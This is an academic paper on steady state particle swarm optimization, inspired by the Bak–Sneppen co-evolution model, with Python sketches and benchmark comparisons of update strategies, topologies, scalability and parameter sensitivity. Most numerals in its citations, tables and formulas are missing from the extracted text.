lbest (where l stands for local) creates a neighborhood with the particle itself and its k nearest neighbors. a particular case of the lbest topology is the ring structure, in which the particles are arranged in a ring, with a degree of connectivity k = , including the particle itself. between the k = connectivity of the lbest ring and the k = n of gbest, there are several possibilities. two of the most used are the two-dimensional square lattices with von neumann and moore neighborhoods. usually, psos are synchronous, meaning that first the fitness values of all vectors must be computed, and only then their velocity is updated. however, there is another possible approach, in which the velocity of the particles is updated immediately after computing the fitness. in this case, the particles move with incomplete knowledge about the global search: if, for instance, the underlying network connecting the particles is a regular graph, then, on average, each particle is updated knowing the current best position found by half of its neighbors and the previous best found by the other half. this variant, which is called asynchronous pso (a-pso), was tested by carlisle & dozier ( ). in that paper, the authors claim that a-pso yields better results than the synchronous version (i.e., s-pso), but since then other authors have reached different conclusions: engelbrecht ( ) and rada-vilela, zhang & seah ( ), for instance, reported that s-pso is better than a-pso in terms of the quality of the solutions and convergence speed. the importance of investigating update strategies for pso lies in the possibility of distributed computation (mcnabb, ). even though standard psos can be easily parallelized (a particle or a set of particles can be assigned to each processor, for instance), load imbalances may cause an inefficient use of the computational resources if synchronous updates are used. asynchronous strategies do not require that all particles in the population have perfect knowledge about the search before the update step (a requirement that may cause idle processor times in a synchronous implementation), and therefore are a valid approach for parallelizing particle swarms. in addition, asynchronism can also be useful in preventing premature convergence (aziz et al., ), or to speed up convergence by skipping function evaluations (majercik, ). here, we are mainly concerned with performance issues in general, and convergence speed in particular. the goal is to design an a-pso that, unlike the standard a-pso, significantly improves on the convergence speed of s-pso in a wide range of problems. we hypothesize that reducing the number of evaluations in each time step, while focusing only on harder cases (i.e., worst solutions), reduces the total number of evaluations required to converge to a specific criterion, that is, the computational effort to reach a solution. with that objective in mind, we have designed and implemented a novel strategy for one of the fundamental mechanisms of pso: the velocity update strategy. following the nature of the method, the algorithm has been entitled steady state pso (ss-pso). in systems theory, a system is said to be in steady state when some of its parts do not change for a period of time (baillieul & samad, ).
ss-pso only updates and evaluates a fraction of the population in each time step: the worst particle and its neighbors, thus imposing a kind of selection pressure upon the whole population. the other particles remain in the same position until they eventually fulfill the criterion (being the worst particle or one of its neighbors). steady state replacement strategies are common in other population-based metaheuristics, namely evolutionary algorithms (whitley & kauth, ). however, steady state populations are much less frequent in pso (majercik, ; fernandes et al., ; allmendiger, li & branke, ). in fact, the strategy proposed in this paper is, to the best of the authors' knowledge, the first that uses a dynamic steady state update coupled with selective pressure. furthermore, results demonstrate that the criterion for selecting the pool of individuals to update is very important for the success of the update strategy: the update step should be restricted to the worst individuals and their neighbors for optimizing performance. with this design, the steady state update strategy is able to improve not only the convergence speed of standard pso configurations, but also that of more sophisticated variants of the algorithm, such as psos with time-varying parameters (ratnaweera, halgamuge & watson, ) and dynamic neighborhood (vora & mirlanalinee, ). the strategy was inspired by the bak–sneppen model of co-evolution between interacting species and by the theory of self-organized criticality (soc) (bak & sneppen, ). soc is a property of some systems that have a critical point as an attractor. however, unlike classical phase transitions, where a parameter needs to be tuned for the system to reach the critical point, soc systems spontaneously reach that critical state between order and randomness. in a soc system near the critical point, small disturbances can cause changes of all magnitudes. these events, which are spatially or temporally spread through the system, are known as avalanches. avalanches occur independently of the initial state. moreover, the same perturbation may cause small or large avalanches, depending on the current state of the system, that is, its proximity to the critical point. the distribution of avalanches during a large period displays a power-law between their size and frequency: small avalanches occur very often while large events that reconfigure almost the entire system are scarcer. soc complex systems balance between stability and creative destruction. in fact, power-law relationships between the size of events and their frequency, one of soc's signatures, are widespread in nature. earthquake distribution, for instance, follows the gutenberg-richter law (gutenberg & richter, ), a power-law proportion between the magnitude of the earthquakes that occurred in a specific area during a specific period of time, and the frequency of those earthquakes. self-organized criticality was studied for the first time in the sandpile model (bak, tang & wiesenfeld, ). since then, the concept has been extended to other complex systems: besides the aforementioned earthquakes, the proponents of the theory claim that soc may be a link between a broad range of phenomena, like forest-fires, ecosystems, financial markets and the brain (bak, ). one such system is the bak–sneppen model of co-evolution between interacting species (bak & sneppen, ).
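the bak–sneppen rule, described in detail just below, is simple enough to simulate in a few lines. the following sketch is a minimal illustration (ring size, number of steps and seed are arbitrary choices, not values taken from the paper):

```python
import numpy as np

def bak_sneppen(n=200, steps=100_000, seed=0):
    """Minimal Bak-Sneppen co-evolution model on a ring: at each step the
    smallest fitness value and its two neighbors are replaced by new
    uniform random values. Returns the final fitness array, most of
    which ends up above a self-organized threshold."""
    rng = np.random.default_rng(seed)
    fitness = rng.random(n)
    for _ in range(steps):
        worst = int(np.argmin(fitness))
        for k in (worst - 1, worst, worst + 1):   # ring neighborhood, wraps around
            fitness[k % n] = rng.random()
    return fitness
```

tracking which sites are replaced over time reveals the avalanche behavior mentioned above: long runs of replacements stay localized, punctuated by occasional cascades that sweep across the ring.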
the bak–sneppen model was developed with the main objective of trying to understand the mechanisms underlying mass extinctions in nature. ecosystems are complex adaptive systems in which the agents (the natural species) are related through several features, like food chains or symbiosis, for instance. in such interconnected environments, the extinction of one species affects the species that are related to it, in a chain reaction that can be of any size: in fact, fossil records suggest that the size of extinction outbreaks is in power-law proportion to their frequency. in order to model the extinction patterns in nature and search for soc signatures in co-evolutionary systems, bak & sneppen ( ) structured a set of species in a ring network and assigned a fitness value to each. then, in every time step, the least fit species and its neighbors are eliminated from the system and replaced by individuals with random fitness. to put it in mathematical terms, the system is defined by n fitness values arranged as a ring (ecosystem). at each time step, the smallest value and its two neighbors are replaced by uncorrelated random values drawn from a uniform distribution. operating with this set of rules, the system is driven to a critical state where most species have reached a fitness value above a certain threshold. near the critical point, extinction events of all scales can be observed. self-organized criticality theory has been a source of inspiration for metaheuristics and unconventional computing techniques. extremal optimization (eo) (boettcher & percus, ), for example, is based on the bak–sneppen model. eo uses a single solution vector that is modified by local search. the algorithm removes the worst components of the vector and replaces them with randomly generated material. by plotting the fitness of the solution, it is possible to observe distinct stages of evolution, where improvement is disturbed by brief periods of dramatic decrease in the quality. løvbjerg & krink ( ) modeled soc in a pso in order to control the convergence of the algorithm and maintain population diversity. the authors claim that their method is faster and attains better solutions than the standard pso. however, the algorithm adds several parameters to the standard pso parameter set: overall, five parameters must be tuned or set to constant ad hoc values. complex and dynamic population structures have been one of the most popular pso research areas in the last decade. the comprehensive-learning pso (clpso) (liang et al., ; lynn & suganthan, ) abandons the global best information, replacing it by a complex and dynamic scheme that uses all other particles' past best information. the algorithm significantly improves the performance of other psos on multimodal problems. ratnaweera, halgamuge & watson ( ) propose new parameter automation strategies that act upon several working mechanisms of the algorithm. the authors introduce the concepts of time-varying acceleration coefficients (pso-tvac) and also mutation, by adding perturbations to randomly selected modulus of the velocity vector. finally, the authors describe a self-organizing hierarchical particle swarm optimizer with time-varying acceleration coefficients, which restricts the velocity update policy to the influence of the cognitive and social parts, reinitializing the particles whenever they are stagnated in the search space. liu, du & wang ( ) describe a pso that uses a scale-free (sf) network for connecting the individuals. sf-pso attains a better balance between solution quality and convergence speed when compared to standard psos with gbest and lbest neighborhood topologies. however, the algorithm is not compared under more sophisticated frameworks or against state-of-the-art psos. furthermore, the size of the test set is small and does not comprise shifted or rotated functions. finally, vora & mirlanalinee ( ) propose a dynamic small world pso (dswpso). each particle communicates with the four individuals of its von neumann neighborhood, to which two random connections are added (and then removed) in each time step. in other words, the neighborhood of each particle is comprised of six particles, four of them fixed throughout the run while the remaining two keep changing. the authors compare the performance of dswpso with other psos and conclude that, due to a more balanced exploration and exploitation trade-off, dswpso is consistently better. in this work, the bak–sneppen model is used to design an alternative update strategy for the pso. the strategy has been previously tested on a set of benchmark functions and compared to a standard s-pso (fernandes, merelo & rosa, ). the results show that ss-pso significantly improves the performance of a s-pso structured in a two-dimensional square lattice with moore neighborhood. this paper is an extension of the aforementioned work. the main contributions here are: (a) a complete statistical analysis of the performance, comparing the algorithm with standard psos and variations of the proposed strategy; (b) a parameter sensitivity analysis and scalability tests showing that the performance enhancement introduced by the steady-state strategy is maintained throughout a reasonable range of parameter values and search space dimensions ranging from to ; and (c) a comparison with state-of-the-art dynamic psos: clpso, pso-tvac and dswpso.

materials and methods

ss-pso algorithm

steady state pso was inspired by a similarity between pso and the bak–sneppen model: both are population models in which the individuals are structured by a network and evolve toward better fitness values. with this likeness in mind, we have devised an
the psos discussed in this paper, including the proposed ss-pso, are available in the openpso package, which offers an efficient, modular and multicore-aware framework for experimenting with different approaches. openpso is composed of three modules: . a pso algorithm library. . a library of benchmarking functions. . a command-line tool for directly experimenting with the different pso algorithms and benchmarking functions. the library components can be interfaced with other programs and programming languages, making openpso a flexible and adaptable framework for pso research. its source code is available at https://github.com/laseeb/openpso. algorithm steady state particle swarm optimization. for all particles i ; . . . mf g do initialize velocity and position of particle i compute fitness of particle i end for all particles i ; . . . mf g do compute pbest and gbest of particle i end repeat update velocity (eq. ( )) of particle with worst fitness and its neighbors update position (eq. ( )) of particle with worst fitness and its neighbors compute fitness of particle with worst fitness and its neighbors for all particles i ; . . . mf g do compute pbest and gbest of particle i until termination criterion is met fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/laseeb/openpso http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ experimental setup for testing the algorithm, benchmark problems (table ) are used. functions f –f are unimodal; f –f are multimodal; f is the shifted f with noise and f is the rotated f (f global optimum and f matrix were taken from the cec benchmark). population size m is set to . this particular value, which lies within the typical range (kennedy & eberhart, ), was set in order to construct square lattices with von neumann and moore neighborhood. following (rada-vilela, zhang & seah, ), c and c were set to . and v to . . xmax, the maximum position value, and vmax, the maximum velocity value, are defined by the domain’s upper limit. asymmetrical initialization is used, with the initialization ranges in table . each algorithm was executed times with each function and statistical measures were taken over those runs. stop criteria have been defined according to the functions and objectives of the experiments (see details in the section “results”). this work reports an extensive study of the proposed methodology. different kinds of experiments have been performed, each one to investigate different aspects of the steady-state update strategy. the first experiment attempts at a proof-of-concept: ss-pso table benchmark functions. mathematical representation range of search/initialization stop criterion sphere f f ~xð Þ ¼ pd i¼ xi (- , )d ( , )d . quadric f f ~xð Þ ¼ pd i¼ pi j¼ xj ! (- , )d ( , )d . hyper ellipsoid f f ~xð Þ ¼ pd i¼ ixi (- , )d ( , )d . rastrigin f f ~xð Þ ¼ pd i¼ xi � cos pxið Þ þ ð Þ (- , )d ( . , . )d griewank f f ~xð Þ ¼ þ ; pd i¼ xi � qd i¼ cos xiffi i p � � (- , )d ( , )d . schaffer f f ~xð Þ ¼ : þ sin ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi x þ y p� � � : : þ : x þ y ð Þð Þ (- , ) ( , ) . weierstrass f f ~xð Þ ¼ pd i¼ pkmax k¼ ak cos pbk xi þ : ð Þ � �� � � d pkmax k¼ ak cos pbk � : � �� � ; a ¼ : ; b ¼ ; kmax ¼ (- . , . )d (- . , . )d . ackley f f ~xð Þ ¼ � exp � : ffiffiffiffiffiffiffiffiffiffiffiffiffiffi d pd i¼ x i s ! � exp d pd i¼ cos pxið Þ þ þ e (- . , . )d ( . , . )d . shifted quadric with noise f f ~zð Þ ¼ pd i¼ pi j¼ zj ! 
� þ : jn ; ð Þjð Þ; ~z ¼ ~x �~o, ~o ¼ o ; ::od½ �: shifted global optimum (- , )d ( , )d . rotated griewank f f ~zð Þ ¼ þ ; pd i¼ z i � qd i¼ cos ziffi i p � � , ~z ¼ m~x, m: orthogonal matrix (- , ) d ( , )d . fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ is compared with standard (and synchronous) update strategies. the objective of the second experiment is to check if the convergence speed-up is caused indeed by the selective strategy or instead by the restricted evaluation pool, which is a consequence of the proposed method. the third test aims at studying the parameter sensitivity and the scalability with problem size. for that purpose, several tests have been conducted in a wide range of parameter values and problem dimension. the fourth experiment investigates ss-pso under time-varying parameters and experiment number five compares ss-pso with dynamically structured psos. results proof-of-concept the first experiment intends to determine if ss-pso is able to improve the performance of a standard s-pso. for that purpose, three s-psos with different topologies have been implemented: lbest with k = (or ring) and two-dimensional square lattices with von neumann (k = ) and moore neighborhood (k = ). gbest k = n is not included in the comparisons because ss-pso uses the neighborhood structure to decide how many and which particles to update: for instance, in the von neumann topology (k = ), five particles are updated. since gbest has k = n, the proposed strategy would update the entire population, that is, it would be equivalent to a s-pso. therefore, we have restricted the study to lbest, von neumann and moore structures, labeling the algorithms, respectively, s-psolbest, s-psovn and s-psomoore. two sets of experiments were conducted. first, the algorithms were run for a specific amount of function evaluations ( , for f , f and f , , for the remaining). after each run, the best solution was recorded. in the second set of experiments the algorithms were all run for , function evaluations or until reaching a function-specific stop criterion (given in table ). a success measure was defined as the number of runs in which an algorithm attains the stop criterion. this experimental setup is similar to those in kennedy & mendes ( ) and rada-vilela, zhang & seah ( ). the dimension of table median, minimum and maximum best fitness ( runs). s-psolbest s-psovn s-psomoore median min max median min max median min max f . e- . e- . e- . e- . e- . e- . e- . e- . e- f . e- . e- . e- . e- . e- . e- . e- . e- . e- f . e- . e- . e- . e- . e- . e- . e- . e- . e- f . e+ . e+ . e+ . e+ . e+ . e+ . e+ . e+ . e+ f . e . e . e- . e . e . e- . e . e . e- f . e . e . e- . e . e . e . e . e . e- f . e . e . e . e . e . e- . e- . e . e f . e- . e- . e- . e- . e- . e- . e- . e- . e- f . e+ . e+ . e+ . e- . e- . e+ . e- . e- . e+ f . e . e . e- . e . e . e- . e- . e . e- note: best median fitness among the three algorithms shown in bold. fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the functions search space is d = (except f , with d = ). the results are in table (fitness), table (evaluations) and table (success rates). the best results among the three algorithms are shown in bold. 
when compared to s-psolbest, s-psomoore attains better solutions (considering median values of fitness distributions over runs) in most of the functions and is faster (considering median values of evaluations required to meet the criteria) in every function. when compared to s-psovn, s-psomoore is faster in every function and yields better median fitness values in unimodal functions. in terms of success rates, s-psomoore clearly outperforms the other topologies in function f , and is much more efficient than s-psolbest in function f . these results are consistent with kennedy & mendes ( ). the algorithms were ranked by the friedman test for each function. table shows the ranks according to the quality of solutions, while table shows the ranks according to table median, minimum and maximum evaluations required to meet the criteria ( runs). s-psolbest s-psovn s-psomoore median min max median min max median min max f , . , , , . , , , , , f , , , , , , , , , f , , , , , , , , , f , , , , , , , . , , f , , , , , , , . , , f , , , , . , , , . , , f , , , , , , , , , f , . , , , , , , . , , f – – – , , , , , , f , . , , , , , , , , note: best median number of evaluations among the three algorithms shown in bold. table success rates. s-psolbest s-psovn s-psomoore f f f f f f f f f f note: best success rate among the three algorithms shown in bold. fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the convergence speed (only the functions on which the three algorithms attained the same success rates were considered in the ranking by convergence speed). overall, s-psomoore ranks first in terms of solutions quality and convergence speed—see fig. . therefore, we conclude that the moore structure is well suited for assessing the validity and relevance the ss-pso. once the best network has been found for this particular set of problems, the next step was to compare synchronous and a-psos on the most efficient topology. for that purpose, we have implemented a ss-psomoore and tested it on the -function set under the same conditions described above. the results can be found in table . table gives a comparison between the performance of s-psomoore and ss-psomoore based on the numerical results and statistical analysis of those same results. the non- parametric mann–whitney test was used to compare the distribution of fitness values and number of evaluations to meet criteria of each algorithm in each function. the ranking of fitness distributions are significant at p � . for f , f , f , f , f , f , that is, in these functions, the null hypothesis that the two samples come from the same population is rejected. for the remaining functions (f , f , f ), the null hypothesis is not rejected: the differences are not significant. table fitness rank by friedman test (with . significance level). the table gives the rank of each algorithm and in parenthesis the algorithms to which the differences are significant according to the friedman test. s-psolbest ( ) s-psovn ( ) s-psomoore ( ) p-value f . ( ) ( ) . ( ) ( ) . ( ) ( ) < . f . ( ) ( ) . ( ) ( ) . ( ) ( ) < . f . ( ) ( ) . ( ) ( ) . ( ) ( ) < . f . ( ) ( ) . ( ) . ( ) < . f . ( ) ( ) . ( ) ( ) . ( ) ( ) < . f . ( ) ( ) . ( ) . ( ) . f . ( ) . ( ) . ( ) ( ) < . f . ( ) ( ) . ( ) ( ) . ( ) ( ) < . f . ( ) ( ) . ( ) ( ) . ( ) ( ) < . f . ( ) ( ) . ( ) ( ) . ( ) ( ) < . table convergence speed rank by friedman test (with . significance level). 
the table gives the rank of each algorithm and in parenthesis the algorithms to which the differences are significant according to the friedman test. s-psolbest ( ) s-psovn ( ) s-psomoore ( ) p-value f . ( ) ( ) . ( ) ( ) . ( ) ( ) < . f . ( ) ( ) . ( ) ( ) . ( ) ( ) < . f . ( ) ( ) . ( ) ( ) . ( ) ( ) < . f . ( ) ( ) . ( ) ( ) . ( ) ( ) < . f . ( ) . ( ) . ( ) ( ) . f . ( ) ( ) . ( ) ( ) . ( ) ( ) < . fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in terms of function evaluations, ss-psomoore is faster in the entire set of unimodal problems. in multimodal problems, ss-psomoore needs less evaluations in f , f , f and f . results of mann–whitney tests are significant at p � . for functions f , f , f , f , f , f , f and f —see table . the success rates are similar, except for f (in which ss-pso clearly outperforms the standard algorithm) and f . in conclusion: empirical results, together with statistical tests, show that according to accuracy, speed and reliability, ss-psomoore outperforms (a) fitness (b) convergence speed . . . . . lbest vn moore . . . . . lbest vn moore figure s-psolbest, s-psovn and s-psomoore: solutions quality (a) and convergence speed (b) rank by the friedman test. full-size doi: . /peerj-cs. /fig- table ss-psomoore results: solutions quality, convergence speed and success rates. fitness evaluations median min max median min max sr f . e- . e- . e- , , , f . e- . e- . e- , , , f . e- . e- . e- , . , , f . e+ . e+ . e+ , , , f . e- . e . e- , , , f . e . e . e , , , f . e . e . e- , , , f . e- . e- . e- , . , , f . e- . e- . e- , , , f . e- . e . e- , . , , table comparing s-psomoore and ss-psomoore with the mann–whitney test. f f f f f f f f f f fitness + + + ≈ ≈ + + ≈ + ≈ evaluations + + + ≈ + ≈ + + + + notes: +if ss-psomoore ranks first in the mann–whitney test and the result is significant. ≈if the differences are not significant. fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ s-psomoore in most of the benchmark functions selected for this test, while not being outperformed in any case. update strategy the preceding tests show that the steady state update strategy when implemented in a pso structured in a lattice with moore neighborhood improves its performance. the following experiment aims at answering an important question: what is the major factor in the performance enhancement? is it the steady state update, or instead the particles that are updated? in order to investigate this issue, two variants of ss-pso were implemented: one that updates the best particle and its neighbors (replace-best); and another that updates a randomly selected particle and its neighbors (replace-random). the algorithms were tested on the same set of benchmark functions and compared the proposed ss-psomoore (or replace-worst). results are in table . replace-best update strategy is outperformed by replace-worst ss-pso. with the exception of f and f , the quality of solutions is degraded when compared to the proposed ss-pso. however, success rates are considerably lower in most functions, including f and f . please note that functions f and f are unimodal and therefore they can be easily solved by hill-climbing and greedy algorithms. it is not surprising that a greedy selective strategy like ss-pso with replace-best can find very good solutions in some runs. 
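the three variants discussed in this section differ only in which particle anchors the pool of updated individuals. assuming a precomputed particle-to-neighborhood mapping such as the one used in the earlier sketch, the selection step could be written as follows (helper and strategy names are illustrative, not taken from openpso):

import numpy as np

def update_pool(pfit, neigh, rng, strategy="replace-worst"):
    # return the indices of the particles to move and re-evaluate this iteration:
    # an anchor particle plus its topological neighbors (minimization assumed)
    if strategy == "replace-worst":        # proposed ss-pso: pressure on the least fit
        anchor = int(np.argmax(pfit))
    elif strategy == "replace-best":       # greedy variant
        anchor = int(np.argmin(pfit))
    elif strategy == "replace-random":     # random anchor, same pool size
        anchor = int(rng.integers(len(pfit)))
    else:
        raise ValueError("unknown strategy: " + strategy)
    return neigh[anchor]

rng = np.random.default_rng(1)
pfit = rng.random(16)                       # personal-best fitness of 16 particles
neigh = [[(i - 1) % 16, i, (i + 1) % 16] for i in range(16)]
print(update_pool(pfit, neigh, rng, "replace-random"))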
however, for more difficult problem, replace-best is clearly unable to find good solutions. as for replace-random, it improves s-pso in some functions, but in general is not better than replace-worst: replace-random ss-pso is less accurate and slower in most of the functions. the friedman test shows that ss-pso with replace-worst strategy ranks first in terms of solutions quality—see fig. . table compares replace-random and replace-worst with the assistance of mann–whitney statistical tests. except for f , replace-worst is significantly more efficient table results of ss-pso variants: median, min, max and success rates (sr). ss-psomoore (replace-best) sr ss-psomoore (replace-random) sr fitness evaluations fitness evaluations median min max median min max median min max median min max f . e- . e- . e+ , , , . e- . e- . e- , , , f . e+ . e- . e+ , , , . e- . e- . e+ , , , f . e- . e- . e+ , , , . e- . e- . e- , , , f . e+ . e+ . e+ , , , . e+ . e+ . e+ , , , f . e- . e . e+ , , , . e . e . e- , . , , f . e- . e . e- , . , , . e . e . e- , , , f . e . e . e+ – – – . e- . e . e , , , f . e . e- . e , , , . e- , e- . e- , . , , f . e- . e- . e+ , , , . e- . e- . e+ , , , f . e+ . e . e+ , , , . e- . e . e- , , , fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ than replace-random. the experiment demonstrates that selective pressure imposed on the least fit individuals is the major factor in the performance of ss-pso. scalability the proof-of-concept showed that ss-pso outperforms s-pso in most of the functions in the test set, and the previous experiment demonstrates that the major factor in the performance enhancement is the pressure on the least fit particles. however, only instances of the problems with d = have been tested; therefore, another question arises at this point: does the improvement shown by ss-pso hold for a wide range of problem sizes? in order to answer that question, we have conducted a scalability study: the algorithms were tested on the same set functions but with d ranging from to (except f , which is a two-dimensional function and for that reason was excluded from this test). as in previous experiments, the algorithms were first run for a limited amount of function evaluations and the best fitness values were recorded. then, the algorithms were all run for , evaluations or until reaching a function-specific stop criterion. the number of iterations required to meet the criterion was recorded and statistical measures were taken over runs. (function f has not been tested for dimensions and because the cec benchmark, from where the orthogonal rotational matrices m have been taken, does not provide the matrices for those dimensions). table shows the median best fitness values attained by each algorithm on each instance of the problems and table shows the success rates. in terms of quality of . . . . . rep. best rep. random rep. worst figure fitness rank by friedman test. full-size doi: . /peerj-cs. /fig- table comparing replace-worst and replace-random with the mann-whitney test. f f f f f f f f f f fitness + + + ≈ ≈ ≈ + + + ≈ evaluations + + + - + + + + + + notes: +if replace-worst ranks first in the mann–whitney test and the result is significant. -if replace-random ranks first and the result is significant. ≈if the differences are not significant. fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ solutions, the performance patterns observed with d = are maintained: the strategy does not introduce scalability difficulties. as for the success rates, except for a few instances, ss-pso attains better or equal success rates. the convergence speed has been graphically represented for better assessment of the effects of growing problem size—see fig. . the graphs show that the proposed strategy does not introduce scalability difficulties (other than the ones intrinsic to standard psos). it also shows that, in general, ss-pso is faster than s-pso. parameter sensitivity particle swarm optimization performance can be severely affected by the parameter values. the inertia weight and acceleration coefficients must be tuned in order to balance exploration and exploitation: if far from the optimal values, convergence speed and/or solution quality can be significantly reduced. population size also influences the performance of population-based metaheuristics: larger populations help to maintain table solutions quality with different problem dimension. d = d = d = d = d = s-pso ss-pso s-pso ss-pso s-pso ss-pso s-pso ss-pso s-pso ss-pso f . e- . e- . e- . e- . e- . e- . e- . e- . e- . e- f . e . e . e- . e- . e- . e- . e- . e- . e- . e- f . e- . e . e- . e- . e- . e- . e- . e- . e- . e- f . e . e . e+ . e+ . e+ . e+ . e+ . e+ . e+ . e+ f . e- . e- . e- . e- . e . e- . e . e- . e . e f . e . e . e . e . e- . e . e- . e- . e- . e- f . e- . e- . e- . e- . e- . e- . e- . e- . e- . e- f . e . e . e- . e- . e- . e- . e+ . e+ . e+ . e+ f . e- . e- – – . e- . e- – – . e . e note: best median fitness among the two algorithms shown in bold. table success rates with different problem dimension. d = d = d = d = d = s-pso ss-pso s-pso ss-pso s-pso ss-pso s-pso ss-pso s-pso ss-pso f f f f f f f f f – – – – note: best success rates among the two algorithms shown in bold. fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ d = d = d = d = d = ev al ua �o ns (a) sphere s-pso moore ss-pso moore d = d = d = d = d = ev al ua �o ns (b) quadric s-pso moore ss-pso moore d = d = d = d = d = ev al ua �o ns (c) hyper s-pso moore ss-pso moore d = d = d = d = d = ev al ua �o ns (d) rastrigin s-pso moore ss-pso moore d = d = d = d = d = ev al ua �o ns (e) griewank s-pso moore ss-pso moore d = d = d = d = d = ev al ua �o ns (f) weierstrass s-pso moore ss-pso moore d = d = d = d = d = ev al ua �o ns (g) ackley s-pso moore ss-pso moore d = d = d = d = d = ev al ua �o ns (h) shi�ed quadric with noise s-pso moore ss-pso moore d = d = d = ev al ua �o ns (i) rotated griewank s-pso moore ss-pso moore figure convergence speed versus problem dimension for sphere (a), quadric (b), hyper (c), rastrigin (d), griewank (e), weierstrass (f), ackley (g), shifted quadric with noise (h) and rotated griewank (i) benchmark functions. full-size doi: . /peerj-cs. /fig- fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ diversity, but they slow down convergence speed; on the other hand, smaller populations are faster but they are more likely to converge to local optima. furthermore, psos empirical studies usually depend on a single set of parameters for several functions with different characteristics. 
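before relating this to the setting used in this paper, the following minimal sweep harness illustrates how such a one-parameter-at-a-time sensitivity study can be organized; it reuses the ss_pso sketch given earlier, and the parameter grids are illustrative values, not the ones used in the experiments.

import numpy as np

def sweep(param_name, values, runs=10, **fixed):
    # vary a single parameter while all others stay fixed and report the
    # median best fitness over repeated runs (uses the ss_pso sketch above)
    results = {}
    for value in values:
        kwargs = dict(fixed, **{param_name: value})
        fits = [ss_pso(seed=run, **kwargs)[0] for run in range(runs)]
        results[value] = float(np.median(fits))
    return results

# illustrative grids for inertia weight, acceleration coefficients and swarm size
print(sweep("omega", [0.4, 0.5, 0.6, 0.7, 0.8], c1=1.5, c2=1.5, mu=36))
print(sweep("c1", [1.0, 1.5, 2.0], omega=0.7, c2=1.5, mu=36))
print(sweep("mu", [16, 36, 64], omega=0.7, c1=1.5, c2=1.5))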
this is the case of this paper, in which a typical parameter setting has been used for evaluating the performance of the psos. that set of parameters is not expected to be the optimal tuning for every function, but rather a compromise that avoids an exponential growth of the experimental procedure. for these reasons, when testing a new pso, it is important to investigate its sensitivity to the parameter values. with that purpose in mind, the following experimental procedure has been designed. synchronous pso and ss-pso were tested on function f (unimodal), f (multimodal), f (shifted and noisy) and f (rotated) with the following parameter values: the inertia weight ω was set to . , . , . , . and . , while the acceleration coefficients and population size remained fixed at . and ; then, c and c were set to . , . , . , . and . while ω and m remained fixed at . and , respectively; finally, population size was set to , and , while ω and the acceleration coefficients were set to . and . . the results are depicted in figs. – . the graphics show that the performance indeed varies with the parameter values, as expected. in the case of function f , other parameter settings attain better results than the ones used in the previous section. however, the relative performance of s-pso and ss-pso is maintained throughout the parameter ranges. in functions f , f and f , the quality of solutions is in general maximized by ω and c values around the ones used in previous sections. convergence speed, in general, improves with lower ω, c and m values. as seen in fig. , s-psomoore ranks first in terms of solutions quality and convergence speed when compared to ring and von neumann topologies. although not a parameter in the strict sense of the term, the network topology is a design choice that significantly affects the performance of the algorithm: kennedy & mendes ( ) investigated several types of networks and recommend the use of von neumann lattices; fernandes et al. ( ) tested regular graphs and concluded that convergence speed improves with the degree of connectivity, but that success rates are in general degraded when k is above nine (equivalent to the moore neighborhood), and that a good compromise is achieved for intermediate values of k. in order to study the performance of ss-pso with different network topologies, regular graphs have been constructed with the following procedure: starting from a ring structure with k = , the degree is increased by linking each individual to its neighbors' neighbors, creating a set of regular graphs with k ∈ { , , , , . . ., m}, as exemplified in fig. for population size (a short construction sketch is given after the figure captions below). parameters c and c were set to . and ω to . , and the population size m was set to . the algorithms were all run for , function evaluations or until reaching the function-specific stop criterion given in table . each algorithm was executed times with each function and statistical measures were taken over those runs. figure shows the success rates and convergence speed of ss-pso structured by topologies with varying k. convergence generally improves with k, achieving optimal values in an intermediate range of k for most of the functions. however, as seen in fig. a, the best success rates are achieved for lower values of k (except f , for which k = is the best topology).
figure fitness (a, c, e) and number of evaluations sensitivity (b, d, f) on the sphere function (f ) to inertia weight (a–b), acceleration coefficients (c–d) and population size (e–f).
figure fitness (a, c, e) and number of evaluations sensitivity (b, d, f) on the ackley function (f ) to inertia weight (a–b), acceleration coefficients (c–d) and population size (e–f).
figure fitness (a, c, e) and number of evaluations sensitivity (b, d, f) on the shifted quadric with noise function (f ) to inertia weight (a–b), acceleration coefficients (c–d) and population size (e–f).
figure fitness (a, c, e) and number of evaluations sensitivity (b, d, f) on the griewank function (f ) to inertia weight (a–b), acceleration coefficients (c–d) and population size (e–f).
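a minimal construction of the regular graphs described above, a ring lattice whose degree k grows by linking each individual to its neighbors' neighbors, could look like this; the adjacency-list format is an illustrative choice and k is assumed even:

def ring_lattice(mu, k):
    # regular graph on mu particles: each particle is linked to the k/2 nearest
    # particles on each side of the ring (plus itself in the list), so k = 2 is
    # the classic lbest ring and larger k approaches the fully connected swarm
    half = k // 2
    neigh = []
    for i in range(mu):
        idx = [(i + offset) % mu for offset in range(-half, half + 1)]
        neigh.append(sorted(set(idx)))
    return neigh

# increasing connectivity, as in the topology study above
for k in (2, 4, 6, 8):
    print(k, ring_lattice(16, k)[0])

these neighborhood lists can be passed to the ss_pso sketch shown earlier in place of its default ring, which is how the varying-k experiment above can be reproduced in spirit.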
